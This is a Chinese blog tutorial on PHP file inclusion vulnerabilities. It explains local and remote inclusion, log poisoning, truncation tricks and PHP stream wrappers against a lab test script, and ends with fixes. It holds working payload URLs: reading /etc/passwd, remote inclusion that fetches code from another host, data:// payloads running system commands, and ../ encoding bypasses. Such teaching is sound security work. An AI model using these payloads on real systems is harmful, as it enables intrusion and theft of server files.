<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">

<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script> 
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">













<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.5.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.5.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=6.5.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico?v=6.5.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.5.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.5.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="严格来说，文件包含漏洞是“代码注入”的一种，这种攻击其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。 常见的导致文件包含（文件读取）的函数如下： PHP： include()：使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。  require()：使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。  require">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含漏洞详解">
<meta property="og:url" content="http://yoursite.com/2018/12/02/文件包含漏洞详解/index.html">
<meta property="og:site_name" content="guolala&#39;s blog">
<meta property="og:description" content="严格来说，文件包含漏洞是“代码注入”的一种，这种攻击其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。 常见的导致文件包含（文件读取）的函数如下： PHP： include()：使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。  require()：使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。  require">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://i.imgur.com/aLJdj9E.png">
<meta property="og:image" content="https://i.imgur.com/tvkgeYA.png">
<meta property="og:image" content="https://i.imgur.com/25CI6aq.png">
<meta property="og:image" content="https://i.imgur.com/wgq7QtT.png">
<meta property="og:image" content="https://i.imgur.com/CSUgdBp.png">
<meta property="og:image" content="https://i.imgur.com/TP2yw0G.png">
<meta property="og:image" content="https://i.imgur.com/HCmTOhJ.png">
<meta property="og:image" content="https://i.imgur.com/MkYTX3b.png">
<meta property="og:image" content="https://i.imgur.com/en29m6p.png">
<meta property="og:image" content="https://i.imgur.com/DNV6gBY.png">
<meta property="og:image" content="https://i.imgur.com/is1PJIk.png">
<meta property="og:image" content="https://i.imgur.com/w5hVkH8.png">
<meta property="og:image" content="https://i.imgur.com/zfzbat0.png">
<meta property="og:image" content="https://i.imgur.com/LWAR7Gk.png">
<meta property="og:image" content="https://i.imgur.com/5uTt3Qz.png">
<meta property="og:image" content="https://i.imgur.com/6I762D1.png">
<meta property="og:image" content="https://i.imgur.com/TO2gT9d.png">
<meta property="og:image" content="https://i.imgur.com/DFzB7L3.png">
<meta property="og:image" content="https://i.imgur.com/Tpznihz.png">
<meta property="og:image" content="https://i.imgur.com/fwBEvdb.png">
<meta property="og:updated_time" content="2018-12-02T10:56:35.202Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件包含漏洞详解">
<meta name="twitter:description" content="严格来说，文件包含漏洞是“代码注入”的一种，这种攻击其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。 常见的导致文件包含（文件读取）的函数如下： PHP： include()：使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。  require()：使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。  require">
<meta name="twitter:image" content="https://i.imgur.com/aLJdj9E.png">



  <link rel="alternate" href="/atom.xml" title="guolala's blog" type="application/atom+xml">




  <link rel="canonical" href="http://yoursite.com/2018/12/02/文件包含漏洞详解/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>文件包含漏洞详解 | guolala's blog</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>
<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">guolala's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">情迷不意乱</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-star"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/12/02/文件包含漏洞详解/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="guolala">
      <meta itemprop="description" content="growing up">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guolala's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">文件包含漏洞详解
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-12-02 16:01:44 / 修改时间：18:56:35" itemprop="dateCreated datePublished" datetime="2018-12-02T16:01:44+08:00">2018-12-02</time>
            

            
              

              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/文件包含/" itemprop="url" rel="index"><span itemprop="name">文件包含</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             阅读次数： 
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>严格来说，文件包含漏洞是“代码注入”的一种，这种攻击其原理就是注入一段用户能控制的脚本或代码，并让服务端执行。</p>
<p><strong>常见的导致文件包含（文件读取）的函数如下：</strong></p>
<p><strong>PHP：</strong></p>
<p><strong>include()</strong>：使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。</p>
<p><img src="https://i.imgur.com/aLJdj9E.png" alt=""></p>
<p><strong>require()</strong>：使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。</p>
<p><img src="https://i.imgur.com/tvkgeYA.png" alt=""></p>
<p><code>require_once()</code> 和 <code>include_once()</code> 功能与require() 和 include() 类似。但如果一个文件已经被包含过了，则 <code>require_once()</code> 和<code>include_once()</code> 则不会再包含它，以避免函数重定义或变量重赋值等问题。</p>
<blockquote>
<p><strong>当利用这四个函数来包含文件时，不管文件是什么类型（图片、txt等等），都会直接作为php文件进行解析。</strong></p>
</blockquote>
<p>接下来的测试会用下面这个非常简单的代码进行：</p>
<pre><code>&lt;?php
    $file = $_GET[&apos;file&apos;];
    include $file;
?&gt;
</code></pre><p>同目录下有一个phpinfo.txt文件（内容为&lt;?php phpinfo();?&gt;）</p>
<p><img src="https://i.imgur.com/25CI6aq.png" alt=""></p>
<h3 id="文件包含有两种："><a href="#文件包含有两种：" class="headerlink" title="文件包含有两种："></a>文件包含有两种：</h3><p>本地文件包含、远程文件包含 （即加载远程文件，在php.ini中开启<code>allow_url_include</code>、<code>allow_url_fopen</code>选项。开启后可以直接执行任意代码。）</p>
<h3 id="漏洞成因："><a href="#漏洞成因：" class="headerlink" title="漏洞成因："></a>漏洞成因：</h3><p>程序开发人员通常出于灵活性的考虑，会将被包含的文件设置成变量，然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件，造成文件包含漏洞。</p>
<ul>
<li>具有相关的文件包含函数。</li>
<li>文件包含函数中存在动态变量，比如 include $file;。</li>
<li>攻击者能够控制该变量，比如$file = $_GET[‘file’];。</li>
</ul>
<h2 id="php的文件包含利用"><a href="#php的文件包含利用" class="headerlink" title="php的文件包含利用"></a>php的文件包含利用</h2><p><strong>在php.ini中，<code>allow_url_fopen</code>默认一直是On，而<code>allow_url_include</code>从php5.2之后就默认为Off。</strong></p>
<h3 id="读取敏感文件"><a href="#读取敏感文件" class="headerlink" title="读取敏感文件"></a>读取敏感文件</h3><p>访问：<code>http://www.test.com/index.php?test=/etc/passwd</code>,如果目标主机存在该文件，并且具有读权限，那么就可以读出文件内容。</p>
<h3 id="远程包含shell"><a href="#远程包含shell" class="headerlink" title="远程包含shell"></a>远程包含shell</h3><ol>
<li><code>allow_url_fopen</code> = On</li>
<li><code>allow_url_include</code> = On</li>
</ol>
<p>在远程文件<code>http://10.60.17.60</code>里写入测试代码。</p>
<pre><code>&lt;?php fputs(fopen(&quot;text.php&quot;, &quot;w&quot;), &quot;&lt;?php phpinfo(); ?&gt;&quot;) ?&gt;
</code></pre><p>  访问<code>http://127.0.0.1/123.php?file=http://10.60.17.46/phpinfo.php</code>。将会在网站根目录下生成text.php文件，内容就是：”<code>&lt;?php phpinfo(); ?&gt;</code>“</p>
<p><img src="https://i.imgur.com/wgq7QtT.png" alt=""></p>
<h3 id="图片上传并包含图片shell"><a href="#图片上传并包含图片shell" class="headerlink" title="图片上传并包含图片shell"></a>图片上传并包含图片shell</h3><p>利用方法和上面的一样，只是这次是本地包含，直接在上传的图片中写入测试代码并访问图片地址即可。</p>
<h3 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h3><p><strong>利用条件：</strong>需要知道ssh-log的位置，且可读。默认情况下为 <code>/var/log/auth.log</code></p>
<pre><code>ubuntu@VM-207-93-ubuntu:~$ ssh &apos;&lt;?php phpinfo(); ?&gt;&apos;@remotehost
</code></pre><p>之后会提示输入密码等等，随便输入。</p>
<p>然后在remotehost的ssh-log中即可写入php代码：</p>
<p><img src="https://i.imgur.com/CSUgdBp.png" alt=""></p>
<p>之后进行文件包含即可。</p>
<h3 id="包含日志文件GetShell"><a href="#包含日志文件GetShell" class="headerlink" title="包含日志文件GetShell"></a>包含日志文件GetShell</h3><p><strong>利用条件：</strong>需要知道服务器日志的存储路径，且日志文件可读。</p>
<p>既然存在文件包含漏洞就可以利用漏洞读取apache的配置文件找到日志文件的位置。（默认：包含日志文件GetShell）</p>
<p>很多时候，web服务器会将请求写入到日志文件中，比如说apache。在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log。默认情况下，日志保存路径在 <code>/var/log/apache2/</code>。</p>
<p>但如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改.</p>
<p><img src="https://i.imgur.com/TP2yw0G.png" alt=""></p>
<p>正常的php代码已经写入了 /var/log/apache2/access.log。然后进行包含即可。</p>
<p><img src="https://i.imgur.com/HCmTOhJ.png" alt=""></p>
<p>在一些场景中，log的地址是被修改掉的。你可以通过读取相应的配置文件后，再进行包含。</p>
<h3 id="长度截断"><a href="#长度截断" class="headerlink" title="长度截断"></a>长度截断</h3><p><strong>利用条件：</strong> php版本 &lt; php 5.2.8</p>
<p>目录字符串，在linux下<strong>4096字节</strong>时会达到最大值，在window下是<strong>256字节</strong>。只要不断的重复<code>./</code></p>
<pre><code>index.php?file=././././省略././shell.txt
</code></pre><h3 id="0字节截断包含"><a href="#0字节截断包含" class="headerlink" title="0字节截断包含"></a>0字节截断包含</h3><p><strong>利用条件：</strong> php版本 &lt; php 5.3.4</p>
<p>测试代码：</p>
<pre><code>&lt;?php
    $file = $_GET[&apos;file&apos;];
    include $file.&apos;/tasdas/asd.php&apos;;
?&gt;

http://127.0.0.1/123.php?file=phpinfo.txt%00
</code></pre><p><img src="https://i.imgur.com/MkYTX3b.png" alt=""></p>
<blockquote>
<p>正常上传图片一句话并访问：<code>http://test.com/index.php?test=1.jpg</code>会出错，因为包含文件里面不存在1.jpg.php这个文件，但是如果输入<code>http://test.com/index.php?test=1.jpg%00</code>，就极有可能会绕过检测。这种方法只适用于php.ini中<code>magic_quotes_qpc=off</code>并且PHP版本小于5.3.4的情况。如果为on，%00会被转义，以至于无法截断。</p>
</blockquote>
<h3 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h3><p>PHP伪协议其实就是PHP支持的协议和封装的协议，</p>
<ul>
<li>file: — 访问本地文件系统</li>
<li>http: — 访问 HTTP(s) 网址</li>
<li>ftp: — 访问 FTP(s) URLs</li>
<li>php: — 访问各个输入/输出流（I/O streams）【php://stdin 是只读的， php://stdout 和 php://stderr 是只写的】</li>
<li>zlib: — 压缩流</li>
<li>data: — 数据（RFC 2397）</li>
<li>glob: — 查找匹配的文件路径模式</li>
<li>phar: — PHP 归档</li>
<li>ssh2: — Secure Shell 2</li>
<li>rar: — RAR</li>
<li>ogg: — 音频流</li>
<li>expect: — 处理交互式的流</li>
</ul>
<p>有两个比较重要的配置在php.ini中，<code>allow_url_fopen</code> 和<code>allow_url_include</code>会影响到fopen和include等等函数对于伪协议的支持，而<code>allow_url_include</code>依赖<code>allow_url_fopen</code>，所以<code>allow_url_fopen</code>不开启的话，<code>allow_url_include</code>也是无法使用的。</p>
<h4 id="File"><a href="#File" class="headerlink" title="File://"></a>File://</h4><p>用于访问文件系统。（可用于任意文件执行），在<code>allow_url_fopen</code> 和<code>allow_url_include</code>任何状态下都可以用。</p>
<h4 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h4><ul>
<li>php版本大于等于php5.2</li>
<li><code>allow_url_fopen</code> = On</li>
<li><code>allow_url_include</code> = On</li>
</ul>
<pre><code>http://127.0.0.1/123.php?file=data:text/plain,&lt;?php phpinfo();?&gt;
</code></pre><p>任意命令执行</p>
<pre><code>http://127.0.0.1/123.php?file=data:text/plain,&lt;?php system(&apos;whoami&apos;);?&gt;
</code></pre><p>利用base64编码绕过</p>
<pre><code>http://127.0.0.1/123.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
</code></pre><blockquote>
<p>加号+的url编码为%2b，PD9waHAgcGhwaW5mbygpOz8+的base64解码为：<code>&lt;?php phpinfo();?&gt;</code></p>
</blockquote>
<p><img src="https://i.imgur.com/en29m6p.png" alt=""></p>
<p><img src="https://i.imgur.com/DNV6gBY.png" alt=""></p>
<h4 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h4><p>php版本大于等于php5.3.0</p>
<p>在网站根目录下有一个phpinfo.txt内容为&lt;?php phpinfo();?&gt;，打包成压缩包。</p>
<p>使用绝对路径：</p>
<pre><code>http://127.0.0.1/123.php?file=phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
</code></pre><p><img src="https://i.imgur.com/is1PJIk.png" alt=""></p>
<p>或者使用相对路径：</p>
<pre><code>http://127.0.0.1/123.php?file=phar://phpinfo.zip/phpinfo.txt
</code></pre><p><img src="https://i.imgur.com/w5hVkH8.png" alt=""></p>
<h4 id="zip-–-zlib-–bzip2-–zip"><a href="#zip-–-zlib-–bzip2-–zip" class="headerlink" title="zip:// – zlib:// –bzip2:// –zip://"></a>zip:// – zlib:// –bzip2:// –zip://</h4><p>php版本大于等于php5.3.0</p>
<p>构造zip包的方法同phar</p>
<p>但是使用zip协议，需要指定<strong>绝对路径</strong>，同时将#编码为%23，之后填上压缩包内的文件。</p>
<pre><code>http://127.0.0.1/123.php?file=zip://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

http://127.0.0.1/123.php?file=zip://phpinfo.zip%23phpinfo.txt

http://127.0.0.1/123.php?file=zip://./phpinfo.zip%23phpinfo.txt
</code></pre><p><img src="https://i.imgur.com/zfzbat0.png" alt=""></p>
<p><strong>压缩流：</strong>在<code>allow_url_fopen</code> 和<code>allow_url_include</code>任何状态下都可以用。</p>
<p>使用方法：</p>
<pre><code>http://127.0.0.1/test/1.php?f=zip://./1.zip%231.txt

http://127.0.0.1/test/1.php?f=zip:///Applications/MAMP/htdos/test/1.zip%231.txt

http://127.0.0.1/test/1.php?f=file=compress.bzip2:///Applications/MAMP/htdos/test/file.jpg

http://127.0.0.1/test/1.php?f=file=compress.bzip2://./file.jpg
</code></pre><h5 id="另一种思路："><a href="#另一种思路：" class="headerlink" title="另一种思路："></a>另一种思路：</h5><p>将要执行的PHP代码写好文件名为phpcode.txt，将phpcode.txt进行zip压缩，压缩文件 名为file.zip，如果可以上传zip文件便直接上传，如果不能则将file.zip重命名为file.jpg后上传，其他几种压缩格式也可以这样操作。</p>
<h4 id="PHP-input"><a href="#PHP-input" class="headerlink" title="PHP://input"></a>PHP://input</h4><p><code>allow_url_include = On。</code></p>
<p>对<code>allow_url_fopen</code>不做要求。</p>
<p><img src="https://i.imgur.com/LWAR7Gk.png" alt=""></p>
<p>可以访问请求的原始数据，简单来说POST请求下，php://input可以获取到post数据，如果<code>enctype=”multipart/form-data”</code> 的时候 php://input 是无效的。</p>
<h4 id="php-output"><a href="#php-output" class="headerlink" title="php://output"></a>php://output</h4><p>php://output 是一个只写的数据流， 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。</p>
<h4 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h4><p>对<code>allow_url_include</code> 和<code>allow_url_fopen</code>不做要求。</p>
<p>在任意文件读取或者getshell会用到这个伪协议。</p>
<pre><code>http://127.0.0.1/123.php?file=php://filter/read=convert.base64-encode/resource=auth.php
</code></pre><p><img src="https://i.imgur.com/5uTt3Qz.png" alt=""></p>
<p>通过指定末尾的文件，可以读取经base64加密后的文件源码，之后再base64解码一下就行。虽然不能直接获取到shell等，但能读取敏感文件危害也是挺大的。</p>
<p><img src="https://i.imgur.com/6I762D1.png" alt=""></p>
<pre><code>http://127.0.0.1/123.php?file=php://filter/convert.base64-encode/resource=auth.php
</code></pre><p>效果跟前面一样，少了read关键字。在绕过一些waf时也许有用。</p>
<p><img src="https://i.imgur.com/TO2gT9d.png" alt=""></p>
<p>php://filter类似于readfile()、file()、file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。</p>
<p>在include函数使用上，经常会造成任意文件读取漏洞，而<code>file_get_contents()</code>和<code>file_put_contents()</code>这样函数下，常常会构成getshell等更严重的漏洞。</p>
<p><strong>php://filter 目标使用以下的参数作为它路径的一部分:</strong></p>
<ul>
<li>resource=&lt;要过滤的数据流&gt;     这个参数是必须的。它指定了你要筛选过滤的数据流。 </li>
<li>read=&lt;读链的筛选列表&gt;     该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。</li>
<li>write=&lt;写链的筛选列表&gt;     该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。</li>
</ul>
<h4 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h4><p>现在在C:\phpStudy\PHPTutorial\phpinfo.txt文件中有php代码&lt;?php phpinfo();?&gt;，则利用../可以进行目录遍历。</p>
<pre><code>http://127.0.0.1/123.php?file=../phpinfo.txt
</code></pre><p><img src="https://i.imgur.com/DFzB7L3.png" alt=""></p>
<blockquote>
<p>实际拼接路径为：C:\phpStudy\PHPTutorial\WWW..\phpinfo.txt即C:\phpStudy\PHPTutorial\phpinfo.txt</p>
</blockquote>
<h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><p>服务器端常常会对于 <strong>../</strong> 等做一些过滤，可以用一些编码来进行绕过。</p>
<p><strong>利用url编码</strong></p>
<p><strong>../：</strong></p>
<ul>
<li>%2e%2e%2f</li>
<li>..%2f</li>
<li>%2e%2e/</li>
</ul>
<p><strong>..\：</strong></p>
<ul>
<li>%2e%2e%5c</li>
<li>..%5c</li>
<li>%2e%2e\</li>
</ul>
<p><strong>二次编码</strong></p>
<p><strong>../：</strong></p>
<ul>
<li>%252e%252e%252f</li>
</ul>
<p><strong>..\：</strong></p>
<ul>
<li>%252e%252e%255c</li>
</ul>
<p><strong>容器/服务器的编码方式</strong></p>
<p><strong>../：</strong></p>
<ul>
<li>..%c0%af</li>
<li>%c0%ae%c0%ae/（java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点））</li>
</ul>
<p><strong>..\：</strong></p>
<ul>
<li>..%c1%9c</li>
</ul>
<h4 id="利用协议"><a href="#利用协议" class="headerlink" title="利用协议"></a>利用协议</h4><p>测试代码：</p>
<pre><code>&lt;?php
    $file = $_GET[&apos;file&apos;];
    include $file.&apos;/test/test.php&apos;;
?&gt;
</code></pre><p>构造压缩包结构如下：</p>
<p><img src="https://i.imgur.com/Tpznihz.png" alt=""></p>
<pre><code>http://127.0.0.1/1.php?file=zip://C:\phpStudy\PHPTutorial\WWW\test.zip%23test

http://127.0.0.1/1.php?file=phar://C:\phpStudy\PHPTutorial\WWW\test.zip
</code></pre><p><img src="https://i.imgur.com/fwBEvdb.png" alt=""></p>
<blockquote>
<p>利用zip协议，注意要指定绝对路径</p>
</blockquote>
<p><strong>则拼接后为：zip://C:\phpStudy\PHPTutorial\WWW\test%23test/test/test.php</strong></p>
<h2 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h2><p>$$导致的变量覆盖，举个例子</p>
<p>$key = ‘hello’</p>
<p>$hello = ‘world’</p>
<p>echo $$key</p>
<p>输出world</p>
<h2 id="文件包含修复方案"><a href="#文件包含修复方案" class="headerlink" title="文件包含修复方案"></a>文件包含修复方案</h2><ul>
<li>禁止远程文件包含： <code>allow_url_include=off</code></li>
<li>配置 <code>open_basedir=</code>指定目录，限制访问区域。</li>
<li>过滤<strong>../</strong>等特殊符号</li>
<li>修改Apache日志文件的存放地址</li>
<li>开启魔术引号 <code>magic_quotes_qpc=on</code></li>
<li>尽量不要使用动态变量调用文件，直接写要包含的文件</li>
</ul>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/02/SQL的WAF绕过/" rel="next" title="SQL的WAF绕过">
                <i class="fa fa-chevron-left"></i> SQL的WAF绕过
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/02/内网渗透——端口转发工具/" rel="prev" title="内网渗透——端口转发工具">
                内网渗透——端口转发工具 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="guolala">
            
              <p class="site-author-name" itemprop="name">guolala</p>
              <p class="site-description motion-element" itemprop="description">growing up</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">47</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/6791921870/" title="Weibo &rarr; https://weibo.com/6791921870/" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#文件包含有两种："><span class="nav-number">1.</span> <span class="nav-text">文件包含有两种：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞成因："><span class="nav-number">2.</span> <span class="nav-text">漏洞成因：</span></a></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#php的文件包含利用"><span class="nav-number"></span> <span class="nav-text">php的文件包含利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#读取敏感文件"><span class="nav-number">1.</span> <span class="nav-text">读取敏感文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程包含shell"><span class="nav-number">2.</span> <span class="nav-text">远程包含shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#图片上传并包含图片shell"><span class="nav-number">3.</span> <span class="nav-text">图片上传并包含图片shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH-log"><span class="nav-number">4.</span> <span class="nav-text">SSH log</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含日志文件GetShell"><span class="nav-number">5.</span> <span class="nav-text">包含日志文件GetShell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#长度截断"><span class="nav-number">6.</span> <span class="nav-text">长度截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0字节截断包含"><span class="nav-number">7.</span> <span class="nav-text">0字节截断包含</span></a></li><li 